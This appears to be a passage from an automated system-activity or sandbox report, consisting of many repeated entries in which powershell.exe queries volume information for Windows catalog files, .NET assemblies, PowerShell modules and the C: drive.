Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
